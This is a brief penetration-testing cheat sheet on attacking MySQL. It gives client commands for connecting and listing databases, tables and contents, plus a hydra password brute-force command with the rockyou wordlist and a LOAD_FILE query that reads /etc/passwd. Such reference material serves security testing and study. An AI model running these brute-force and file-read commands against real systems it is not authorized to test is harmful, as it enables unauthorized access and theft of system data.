Shelled

Attacking MySQL

Criteria

Connect

Description

To connect to MySQL from Linux host.

mysql -h $IP -u shelled -pPassword123

List Databases

Description

To list databases in MySQL.

SHOW DATABASES

List Tables

Description

To list tables in MySQL. First we need to select a database to use.

USE users;

Step 2

SHOW TABLES;

List Content

Description

To content in a table in MySQL.

select * from {TABLE_NAME};

Attacks

Password Bruteforce

Description

We can use hydra to bruteforce passwords.

hydra -l shelled -P /usr/share/wordlist/rockyou.txt {IP} mysql

File Read

Description

By default a MySQL installation does not allow arbitrary file read, but if the correct settings are in place and with the appropriate privileges, we can read files using the following methods:

select LOAD_FILE("/etc/passwd");